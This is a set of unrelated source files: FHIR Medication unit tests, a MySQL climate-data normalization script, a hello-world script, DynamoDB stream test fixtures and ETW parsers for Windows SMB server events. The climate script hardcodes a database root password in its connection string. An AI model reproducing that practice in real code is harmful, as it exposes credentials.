data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_5(inst2)
def impl_medication_6(inst):
assert inst.form.coding[0].code == "385219001"
assert inst.form.coding[0].display == "Injection Solution (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.form.text == "Injection Solution (qualifier value)"
assert inst.id == "med0317"
assert inst.ingredient[0].itemCodeableConcept.coding[0].code == "204520"
assert (
inst.ingredient[0].itemCodeableConcept.coding[0].display == "Potassium Chloride"
)
assert (
inst.ingredient[0].itemCodeableConcept.coding[0].system
== "http://www.nlm.nih.gov/research/umls/rxnorm"
)
assert inst.ingredient[0].strength.denominator.code == "mL"
assert inst.ingredient[0].strength.denominator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.denominator.value) == float(1)
assert inst.ingredient[0].strength.numerator.code == "meq"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(2)
assert inst.ingredient[1].itemCodeableConcept.coding[0].code == "313002"
assert (
inst.ingredient[1].itemCodeableConcept.coding[0].display
== "Sodium Chloride 0.9% injectable solution"
)
assert (
inst.ingredient[1].itemCodeableConcept.coding[0].system
== "http://www.nlm.nih.gov/research/umls/rxnorm"
)
assert inst.ingredient[1].strength.denominator.code == "mL"
assert inst.ingredient[1].strength.denominator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[1].strength.denominator.value) == float(100)
assert inst.ingredient[1].strength.numerator.code == "g"
assert inst.ingredient[1].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[1].strength.numerator.value) == float(0.9)
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_6(base_settings):
"""No. 6 tests collection for Medication.
Test File: medicationexample0317.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0317.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_6(inst)
    # testing reverse by generating data from itself and creating it again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_6(inst2)
def impl_medication_7(inst):
assert inst.code.text == "Amoxicillin 250mg/5ml Suspension"
assert inst.id == "medicationexample1"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.div == (
'<div xmlns="http://www.w3.org/1999/xhtml">Amoxicillin '
"250mg/5ml Suspension</div>"
)
assert inst.text.status == "generated"
def test_medication_7(base_settings):
"""No. 7 tests collection for Medication.
Test File: medicationexample1.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample1.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_7(inst)
    # testing reverse by generating data from itself and creating it again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_7(inst2)
def impl_medication_8(inst):
assert inst.batch.expirationDate == fhirtypes.DateTime.validate(
"2017-05-22T11:15:33+10:00"
)
assert inst.batch.lotNumber == "9494788"
assert inst.code.coding[0].code == "213293"
assert inst.code.coding[0].display == "Capecitabine 500mg oral tablet (Xeloda)"
assert inst.code.coding[0].system == "http://www.nlm.nih.gov/research/umls/rxnorm"
assert inst.contained[0].id == "org2"
assert inst.contained[1].id == "sub04"
assert inst.form.coding[0].code == "385055001"
assert inst.form.coding[0].display == "Tablet dose form (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "medexample015"
assert inst.ingredient[0].itemReference.reference == "#sub04"
assert inst.ingredient[0].strength.denominator.code == "TAB"
assert (
inst.ingredient[0].strength.denominator.system
== "http://terminology.hl7.org/CodeSystem/v3-orderableDrugForm"
)
assert float(inst.ingredient[0].strength.denominator.value) == float(1)
assert inst.ingredient[0].strength.numerator.code == "mg"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(500)
assert inst.manufacturer.reference == "#org2"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_8(base_settings):
"""No. 8 tests collection for Medication.
Test File: medicationexample15.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample15.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_8(inst)
    # testing reverse by generating data from itself and creating it again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_8(inst2)
def impl_medication_9(inst):
assert inst.code.coding[0].code == "108761006"
assert inst.code.coding[0].display == "Capecitabine (product)"
assert inst.code.coding[0].system == "http://snomed.info/sct"
assert inst.contained[0].id == "sub03"
assert inst.form.coding[0].code == "385055001"
assert inst.form.coding[0].display == "Tablet dose form (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "med0321"
assert inst.ingredient[0].itemReference.reference == "#sub03"
assert inst.ingredient[0].strength.denominator.code == "385055001"
assert inst.ingredient[0].strength.denominator.system == "http://snomed.info/sct"
assert inst.ingredient[0].strength.denominator.unit == "Tablet"
assert float(inst.ingredient[0].strength.denominator.value) == float(1)
assert inst.ingredient[0].strength.numerator.code == "mg"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(500)
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_9(base_settings):
"""No. 9 tests collection for Medication.
Test File: medicationexample0321.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0321.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_9(inst)
    # testing reverse by generating data from itself and creating it again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_9(inst2)
def impl_medication_10(inst):
assert inst.code.coding[0].code == "324252006"
assert inst.code.coding[0].display == "Azithromycin 250mg capsule (product)"
assert inst.code.coding[0].system == "http://snomed.info/sct"
assert inst.contained[0].id == "sub03"
assert inst.form.coding[0].code == "385055001"
assert inst.form.coding[0].display == "Tablet dose form (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "med0320"
assert inst.ingredient[0].itemReference.reference == "#sub03"
assert inst.ingredient[0].strength.denominator.code == "TAB"
assert (
inst.ingredient[0].strength.denominator.system
== "http://terminology.hl7.org/CodeSystem/v3-orderableDrugForm"
)
assert float(inst.ingredient[0].strength.denominator.value) == float(1)
assert inst.ingredient[0].strength.numerator.code == "mg"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(250)
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_10(base_settings):
"""No. 10 tests collection for Medication.
Test File: medicationexample0320.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0320.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_10(inst)
    # testing reverse by generating data from itself and creating it again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_10(inst2)

# File: python/cru_normalization.py (repo: fraxen/nordpil_arcpy, license: Apache-2.0)
# My little script to try to normalize the heavy txt files supplied with the CGIAR formatted CRU TS 2.1
# Works with a MySQL database via the MySQL ODBC 5.1 driver
import pyodbc
cnxn = pyodbc.connect('DRIVER=MySQL ODBC 5.1 Driver;SERVER=localhost;DATABASE=cruts21;UID=root;PWD=AlGlut')
cursor = cnxn.cursor()
# {{{ ACTUAL DATA
for Variable in ['cld','dtr','frs','pre','tmn','tmp','tmx','vap','wet']:
print '\n\n-----\nVariable: ' + Variable
cursor.execute("DROP TABLE IF EXISTS "+Variable);
cnxn.commit()
cursor.execute("CREATE TABLE `"+Variable+"` (`RowID` bigint(20) NOT NULL AUTO_INCREMENT,`CellID` bigint(20) NOT NULL,`DataYear` bigint(20) NOT NULL,`M1` bigint(20) NOT NULL,`M2` bigint(20) NOT NULL,`M3` bigint(20) NOT NULL,`M4` bigint(20) NOT NULL,`M5` bigint(20) NOT NULL,`M6` bigint(20) NOT NULL,`M7` bigint(20) NOT NULL,`M8` bigint(20) NOT NULL,`M9` bigint(20) NOT NULL,`M10` bigint(20) NOT NULL,`M11` bigint(20) NOT NULL,`M12` bigint(20) NOT NULL,PRIMARY KEY (`RowID`)) ENGINE=InnoDB DEFAULT CHARSET=utf8;")
cnxn.commit()
for Period in ['1901-1920','1921-1940','1941-1960','1961-1980','1981-2000','2001-2002']:
print '-- Setting up tables for : ' + Period + ' ('+Variable+')'
startYear = int(Period.split('-')[0])
endYear = int(Period.split('-')[1])
dataField = ""
ignoreFields = "id"
for popYear in range(startYear,endYear+1):
for month in range(1,13):
dataField = dataField + ',`M'+str(month)+'Y'+str(popYear)+'` bigint(20) NOT NULL'
ignoreFields = ignoreFields + ',M' + str(month) + 'Y'+ str(popYear)
cursor.execute("DROP TABLE IF EXISTS `"+Variable+"_"+Period+"_data`")
cursor.execute("CREATE TABLE `"+Variable+"_"+Period+"_data` (`Id` bigint(20) NOT NULL"+dataField+",PRIMARY KEY (`Id`)) ENGINE=InnoDB DEFAULT CHARSET=utf8;")
print '-- Loading data from: ' + Variable+'_'+Period+'_data.txt'
cursor.execute("LOAD DATA INFILE 'c:/mnt/data/ws/cruts/global_DATA/"+Variable+"_"+Period+"_data.txt' INTO TABLE `"+Variable+"_"+Period+"_data` FIELDS TERMINATED BY ',' IGNORE 1 LINES ("+ignoreFields+");")
cnxn.commit()
for popYear in range(startYear,endYear+1):
popYear = str(popYear)
print '-- -- Normalizing year ' + popYear + ' ('+Variable+')'
cursor.execute("INSERT INTO "+Variable+" (CellID, DataYear, M1, M2, M3, M4, M5, M6, M7, M8, M9, M10, M11, M12) SELECT ID AS CellID, "+popYear+" AS DataYear, M1Y"+popYear+" AS M1, M2Y"+popYear+" AS M2, M3Y"+popYear+" AS M3, M4Y"+popYear+" AS M4, M5Y"+popYear+" AS M5, M6Y"+popYear+" AS M6, M7Y"+popYear+" AS M7, M8Y"+popYear+" AS M8, M9Y"+popYear+" AS M9, M10Y"+popYear+" AS M10, M11Y"+popYear+" AS M11, M12Y"+popYear+" AS M12 FROM `"+Variable+"_"+Period+"_data`;")
cnxn.commit()
# }}}
# {{{ STATION RECORD
for Variable in ['cld','dtr','pre','tmp','vap','wet']:
print '\n\n-----\nVariable: ' + Variable + " - station record"
cursor.execute("DROP TABLE IF EXISTS "+Variable+"_stn");
cnxn.commit()
cursor.execute("CREATE TABLE `"+Variable+"_stn` (`RowID` bigint(20) NOT NULL AUTO_INCREMENT,`CellID` bigint(20) NOT NULL,`DataYear` bigint(20) NOT NULL,`M1` bigint(20) NOT NULL,`M2` bigint(20) NOT NULL,`M3` bigint(20) NOT NULL,`M4` bigint(20) NOT NULL,`M5` bigint(20) NOT NULL,`M6` bigint(20) NOT NULL,`M7` bigint(20) NOT NULL,`M8` bigint(20) NOT NULL,`M9` bigint(20) NOT NULL,`M10` bigint(20) NOT NULL,`M11` bigint(20) NOT NULL,`M12` bigint(20) NOT NULL,PRIMARY KEY (`RowID`)) ENGINE=InnoDB DEFAULT CHARSET=utf8;")
cnxn.commit()
for Period in ['1901-1920','1921-1940','1941-1960','1961-1980','1981-2000','2001-2002']:
print '-- Setting up tables for : ' + Period + ' ('+Variable+') - station record'
startYear = int(Period.split('-')[0])
endYear = int(Period.split('-')[1])
dataField = ""
ignoreFields = "id"
for popYear in range(startYear,endYear+1):
for month in range(1,13):
dataField = dataField + ',`M'+str(month)+'Y'+str(popYear)+'` bigint(20) NOT NULL'
ignoreFields = ignoreFields + ',M' + str(month) + 'Y'+ str(popYear)
cursor.execute("DROP TABLE IF EXISTS `"+Variable+"_"+Period+"_stn`")
cursor.execute("CREATE TABLE `"+Variable+"_"+Period+"_stn` (`Id` bigint(20) NOT NULL"+dataField+",PRIMARY KEY (`Id`)) ENGINE=InnoDB DEFAULT CHARSET=utf8;")
print '-- Loading data from: ' + Variable+'_'+Period+'_stn.txt'
cursor.execute("LOAD DATA INFILE 'c:/mnt/data/ws/cruts/global_stn/"+Variable+"_"+Period+"_stn.txt' INTO TABLE `"+Variable+"_"+Period+"_stn` FIELDS TERMINATED BY ',' IGNORE 1 LINES ("+ignoreFields+");")
cnxn.commit()
for popYear in range(startYear,endYear+1):
popYear = str(popYear)
print '-- -- Normalizing year ' + popYear + ' ('+Variable+') - station record'
cursor.execute("INSERT INTO "+Variable+"_stn (CellID, DataYear, M1, M2, M3, M4, M5, M6, M7, M8, M9, M10, M11, M12) SELECT ID AS CellID, "+popYear+" AS DataYear, M1Y"+popYear+" AS M1, M2Y"+popYear+" AS M2, M3Y"+popYear+" AS M3, M4Y"+popYear+" AS M4, M5Y"+popYear+" AS M5, M6Y"+popYear+" AS M6, M7Y"+popYear+" AS M7, M8Y"+popYear+" AS M8, M9Y"+popYear+" AS M9, M10Y"+popYear+" AS M10, M11Y"+popYear+" AS M11, M12Y"+popYear+" AS M12 FROM `"+Variable+"_"+Period+"_stn`;")
cnxn.commit()
# }}}
cnxn.close()
# ALSO - LOAD COORDINATES! (don't forget to have the ll coords as floating point
# ADD INDEXES...
# ALTER TABLE pre ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE cld ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE dtr ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE frs ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE tmn ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE tmp ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE tmx ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE vap ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE wet ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE cld_stn ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE dtr_stn ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE pre_stn ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE tmp_stn ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE vap_stn ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
# ALTER TABLE wet_stn ADD INDEX CellIndex (CellID), ADD INDEX YearIndex (DataYear), ADD INDEX CellYear (CellID,DataYear);
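The commented ALTER TABLE lines above are meant to be pasted into a MySQL client by hand; a minimal sketch of generating the same index DDL in Python so it could be fed through the script's existing cursor (the table list is copied from the comments; `index_ddl` is a hypothetical helper, not part of the original script):

```python
# Hedged sketch: table and index names copied from the commented
# ALTER TABLE block above; the helper name is hypothetical.
TABLES = ['pre', 'cld', 'dtr', 'frs', 'tmn', 'tmp', 'tmx', 'vap', 'wet',
          'cld_stn', 'dtr_stn', 'pre_stn', 'tmp_stn', 'vap_stn', 'wet_stn']

def index_ddl(table):
    # Build one ALTER TABLE statement matching the comment block above.
    return ("ALTER TABLE " + table +
            " ADD INDEX CellIndex (CellID),"
            " ADD INDEX YearIndex (DataYear),"
            " ADD INDEX CellYear (CellID,DataYear);")

statements = [index_ddl(t) for t in TABLES]
# Each statement could then be run with cursor.execute(...) followed by
# cnxn.commit(), reusing the connection opened at the top of the script.
```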

# File: hello_world.py (repo: alexkar7/jenkins_python_test, license: MIT)
# Greeting world
print("¡¡¡Hello World!!!")

# File: lambda_streams/conftest.py (repo: byrro/serverless-website-demo, license: Apache-2.0)
#!/usr/bin/python3.8
import pytest
@pytest.fixture(scope='function', autouse=True)
def load_environment_vars(monkeypatch):
monkeypatch.setenv(
'FIREHOSE_ANALYTICAL_STREAM_NAME', 'firehose-analytical')
monkeypatch.setenv('FIREHOSE_LIKES_STREAM_NAME', 'firehose-likes')
@pytest.fixture()
def sample_ddb_streams():
return {
"Records": [
{
"eventID": "22913059a4e7bb091988bafeccd304c6",
"eventName": "INSERT",
"eventVersion": "1.1",
"eventSource": "aws:dynamodb",
"awsRegion": "us-east-1",
"dynamodb": {
"ApproximateCreationDateTime": 1594596504,
"Keys": {
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
}
},
"NewImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "0"
}
},
"SequenceNumber": "4827400000000015091308973",
"SizeBytes": 228,
"StreamViewType": "NEW_AND_OLD_IMAGES"
},
"eventSourceARN": "arn:aws:dynamodb:us-east-1:1234567890:table/sls-blog-api-slsblogdynamotable2DB89FEB-18HZJCQJL6B8B/stream/2020-07-11T22:39:48.714" # NOQA
},
{
"eventID": "4dc1735c9f1700aa04e8b41dccda0fe4",
"eventName": "MODIFY",
"eventVersion": "1.1",
"eventSource": "aws:dynamodb",
"awsRegion": "us-east-1",
"dynamodb": {
"ApproximateCreationDateTime": 1594596509,
"Keys": {
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
}
},
"NewImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "1"
}
},
"OldImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "0"
}
},
"SequenceNumber": "4827500000000015091312048",
"SizeBytes": 423,
"StreamViewType": "NEW_AND_OLD_IMAGES"
},
"eventSourceARN": "arn:aws:dynamodb:us-east-1:1234567890:table/sls-blog-api-slsblogdynamotable2DB89FEB-18HZJCQJL6B8B/stream/2020-07-11T22:39:48.714" # NOQA
},
{
"eventID": "03e30497caa63b756f0b41b7994e31e7",
"eventName": "MODIFY",
"eventVersion": "1.1",
"eventSource": "aws:dynamodb",
"awsRegion": "us-east-1",
"dynamodb": {
"ApproximateCreationDateTime": 1594596510,
"Keys": {
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
}
},
"NewImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "2"
}
},
"OldImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "1"
}
},
"SequenceNumber": "4827600000000015091312265",
"SizeBytes": 424,
"StreamViewType": "NEW_AND_OLD_IMAGES"
},
"eventSourceARN": "arn:aws:dynamodb:us-east-1:1234567890:table/sls-blog-api-slsblogdynamotable2DB89FEB-18HZJCQJL6B8B/stream/2020-07-11T22:39:48.714" # NOQA
},
{
"eventID": "7598ab43a2f4e8b5f577adb7c6c89869",
"eventName": "MODIFY",
"eventVersion": "1.1",
"eventSource": "aws:dynamodb",
"awsRegion": "us-east-1",
"dynamodb": {
"ApproximateCreationDateTime": 1594596510,
"Keys": {
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
}
},
"NewImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "3"
}
},
"OldImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "2"
}
},
"SequenceNumber": "4827700000000015091312311",
"SizeBytes": 424,
"StreamViewType": "NEW_AND_OLD_IMAGES"
},
"eventSourceARN": "arn:aws:dynamodb:us-east-1:1234567890:table/sls-blog-api-slsblogdynamotable2DB89FEB-18HZJCQJL6B8B/stream/2020-07-11T22:39:48.714" # NOQA
},
{
"eventID": "eefcd432b29133bfd5c1780d1b66b5e3",
"eventName": "MODIFY",
"eventVersion": "1.1",
"eventSource": "aws:dynamodb",
"awsRegion": "us-east-1",
"dynamodb": {
"ApproximateCreationDateTime": 1594596510,
"Keys": {
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
}
},
"NewImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "4"
}
},
"OldImage": {
"time-to-live": {
"N": "1594682904"
},
"item-type": {
"S": "blog-article"
},
"publisher-name": {
"S": "Renato Byrro"
},
"publish-timestamp": {
"N": "1594596504"
},
"id": {
"S": "da4c60a5db7672b2ce71a2d11a0048eb"
},
"body": {
"S": "Lorem ipsum"
},
"publisher-email": {
"S": "renato@byrro.dev"
},
"title": {
"S": "Hello world!"
},
"likes": {
"N": "3"
}
},
"SequenceNumber": "4827800000000015091312450",
"SizeBytes": 424,
"StreamViewType": "NEW_AND_OLD_IMAGES"
},
"eventSourceARN": "arn:aws:dynamodb:us-east-1:1234567890:table/sls-blog-api-slsblogdynamotable2DB89FEB-18HZJCQJL6B8B/stream/2020-07-11T22:39:48.714" # NOQA
}
]
}

# File: etl/parsers/etw/Microsoft_Windows_SMBServer.py (repo: IMULMUL/etl-parser, license: Apache-2.0)
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-SMBServer
GUID : d48ce617-33a2-4bc3-a5c7-11aa4f29619e
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1, version=2)
class Microsoft_Windows_SMBServer_1_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"SecurityMode" / Int16ul,
"Capabilities" / Int32ul,
"DialectCount" / Int16ul,
"Dialects" / Int16ul,
"ClientGuid" / Guid,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=2, version=2)
class Microsoft_Windows_SMBServer_2_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"VcNumber" / Int8ul,
"SecurityMode" / Int8ul,
"Capabilities" / Int32ul,
"Channel" / Int32ul,
"PreviousSessionId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=3, version=2)
class Microsoft_Windows_SMBServer_3_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=4, version=2)
class Microsoft_Windows_SMBServer_4_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"PathLength" / Int16ul,
"Path" / Bytes(lambda this: this.PathLength),
"ConnectionGUID" / Guid,
"SessionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=5, version=2)
class Microsoft_Windows_SMBServer_5_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=6, version=2)
class Microsoft_Windows_SMBServer_6_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=7, version=2)
class Microsoft_Windows_SMBServer_7_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=8, version=2)
class Microsoft_Windows_SMBServer_8_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"SecurityFlags" / Int8ul,
"RequestedOplockLevel" / Int8ul,
"ImpersonationLevel" / Int32ul,
"CreateFlags" / Int64ul,
"RootDirectoryFid" / Int64ul,
"DesiredAccess" / Int32sl,
"FileAttributes" / Int32sl,
"ShareAccess" / Int32sl,
"CreateDisposition" / Int32sl,
"CreateOptions" / Int32sl,
"NameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.NameLength),
"CreateContextsCount" / Int32ul,
"LeaseKey" / Guid,
"LeaseLevel" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid
)
